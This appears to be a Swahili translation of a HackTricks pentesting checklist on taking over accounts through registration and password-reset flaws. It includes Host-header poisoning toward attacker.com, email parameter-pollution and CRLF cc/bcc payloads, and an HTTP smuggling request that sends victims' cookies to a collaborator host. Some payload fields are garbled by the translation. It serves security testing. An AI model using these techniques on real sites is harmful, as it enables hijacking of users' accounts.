11 KiB
Misaada ya Usajili & Mapungufu ya Kuchukua Udhibiti
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana katika HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.
WhiteIntel
WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.
Lengo kuu la WhiteIntel ni kupambana na kuchukua udhibiti wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao bure hapa:
{% embed url="https://whiteintel.io" %}
Kuchukua Udhibiti wa Usajili
Usajili wa Kujirudia
- Jaribu kuzalisha ukitumia jina la mtumiaji lililopo
- Angalia kwa kubadilisha barua pepe:
- herufi kubwa
- +1@
- ongeza mshale katika barua pepe
- herufi maalum katika jina la barua pepe (%00, %09, %20)
- Weka herufi nyeusi baada ya barua pepe:
test@test.com a
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
Uchunguzi wa Jina la Mtumiaji
Angalia ikiwa unaweza kugundua wakati jina la mtumiaji tayari limeandikishwa ndani ya programu.
Sera ya Nenosiri
Unapounda mtumiaji angalia sera ya nenosiri (angalia ikiwa unaweza kutumia nywila dhaifu).
Katika kesi hiyo unaweza jaribu kuvunja nguvu za siri.
SQL Injection
Angalia ukurasa huu ili kujifunza jinsi ya kujaribu kuchukua udhibiti wa akaunti au kutoa habari kupitia SQL Injections katika fomu za usajili.
Uchukua Udhibiti kupitia Oauth
{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}
Mapungufu ya SAML
{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}
Badilisha Barua Pepe
Baada ya kusajili jaribu kubadilisha barua pepe na angalia ikiwa mabadiliko haya yanathibitishwa kwa usahihi au yanaweza kubadilishwa kuwa barua pepe za kupindukia.
Uchunguzi Zaidi
- Angalia ikiwa unaweza kutumia barua pepe za kutumika mara moja
- Nenosiri ndefu (>200) husababisha DoS
- Angalia mipaka ya kiwango cha uundaji wa akaunti
- Tumia username@burp_collab.net na uchambue kurudi kwa wito
Kuchukua Udhibiti wa Rudisha Nenosiri
Kuvuja kwa Kitambulisho cha Rudisha Nenosiri Kupitia Referrer
- Omba kurejesha nenosiri kwa anwani yako ya barua pepe
- Bonyeza kiungo cha kurejesha nenosiri
- Usibadilishe nenosiri
- Bonyeza tovuti za tatu(eg: Facebook, twitter)
- Kukamata ombi katika Burp Suite proxy
- Angalia ikiwa kichwa cha referrer kinavuja kitambulisho cha kurejesha nenosiri.
Sumu ya Rudisha Nenosiri
- Kukamata ombi la kurejesha nenosiri katika Burp Suite
- Ongeza au hariri vichwa vifuatavyo katika Burp Suite :
Host: attacker.com
,X-Forwarded-Host: attacker.com
- Wasilisha ombi lenye kichwa kilichobadilishwa
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
- Tafuta URL ya kurejesha nenosiri kulingana na kichwa cha mwenyeji kama :
https://attacker.com/reset-password.php?token=TOKEN
Rudisha Nenosiri Kupitia Parameta ya Barua Pepe
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
IDOR kwenye Vigezo vya API
- Mshambuliaji lazima aingie kwenye akaunti yao na kwenda kwenye kipengele cha Badilisha nenosiri.
- Anza Burp Suite na Kukamata ombi
- Tuma kwenye kichupo cha kurudia na urekebishe vigezo: Kitambulisho cha Mtumiaji/barua pepe
powershell POST /api/changepass [...] ("fomu": {"barua pepe":"mwathiriwa@email.com","nenosiri":"salama"})
Kitufe Dhaifu cha Kurejesha Nenosiri
Kitufe cha kurejesha nenosiri kinapaswa kuundwa kwa nasibu na kuwa kipekee kila wakati.
Jaribu kubaini ikiwa kitufe hicho kina muda wa kumalizika au ikiwa ni sawa kila wakati, kwa baadhi ya matukio algorithmu ya uundaji ni dhaifu na inaweza kudhaniwa. Viwango vifuatavyo vinaweza kutumiwa na algorithmu.
- Muda wa saa
- Kitambulisho cha Mtumiaji
- Barua pepe ya Mtumiaji
- Jina la Kwanza na la Mwisho
- Tarehe ya Kuzaliwa
- Kriptografia
- Nambari pekee
- Mfululizo mdogo wa kitufe (herufi kati ya [A-Z,a-z,0-9])
- Kutumia kitufe tena
- Tarehe ya muda wa kitufe kumalizika
Kuvuja kwa Kitufe cha Kurejesha Nenosiri
- Chochote ombi la kurejesha nenosiri kwa kutumia API/UI kwa barua pepe fulani k.m: jaribio@mail.com
- Angalia majibu ya seva na tafuta
resetToken
- Kisha tumia kitufe kwenye URL kama
https://mfano.com/v3/mtumiaji/nenosiri/rejesha?resetToken=[KITUFU_CHA_KUREJESHA]&barua pepe=[BARUA_PEPE]
Kurejesha Nenosiri Kupitia Kugongana kwa Jina la Mtumiaji
- Jisajili kwenye mfumo na jina la mtumiaji linalofanana na jina la mtumiaji wa muathiriwa, lakini na nafasi nyeupe zilizoingizwa kabla na/au baada ya jina la mtumiaji. k.m:
"admin "
- Omba kurejesha nenosiri na jina lako la mtumiaji la hila.
- Tumia kitufe kilichotumwa kwenye barua pepe yako na urejeshe nenosiri la muathiriwa.
- Unganisha kwenye akaunti ya muathiriwa na nenosiri jipya.
Jukwaa la CTFd lilikuwa na udhaifu wa shambulio hili.
Angalia: CVE-2020-7245
Kuchukua Udhibiti wa Akaunti Kupitia Kuvuja kwa Maandishi ya Msalaba kwenye Tovuti
- Tafuta XSS ndani ya programu au kikoa ikiwa vidakuzi vimeelekezwa kwenye kikoa cha mzazi:
*.domain.com
- Vuja kuki za vikao vya sasa
- Thibitisha kama mtumiaji kwa kutumia kuki
Kuchukua Udhibiti wa Akaunti Kupitia Ombi la HTTP Smuggling
- Tumia smuggler kugundua aina ya Ombi la HTTP Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
\ - Unda ombi litakalobadilisha
POST / HTTP/1.1
na data ifuatayo:
GET http://kitu.burpcollaborator.net HTTP/1.1 X:
kwa lengo la kuhamisha waathiriwa kwenye burpcollab na kuiba vidakuzi vyao\ - Ombi la mwisho linaweza kuonekana kama ifuatavyo
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hackerone ripoti za kutumia kosa hili
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
Kuchukua Akaunti kupitia CSRF
- Unda mzigo wa CSRF, k.m: "Fomu ya HTML na utoaji wa moja kwa moja kwa mabadiliko ya nenosiri"
- Tuma mzigo
Kuchukua Akaunti kupitia JWT
JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
- Hariri JWT na Kitambulisho cha Mtumiaji / Barua pepe nyingine
- Angalia saini dhaifu ya JWT
{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}
Marejeo
WhiteIntel
WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa utendaji wa bure kuchunguza ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.
Lengo kuu la WhiteIntel ni kupambana na kuchukua akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa bure hapa:
{% embed url="https://whiteintel.io" %}
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.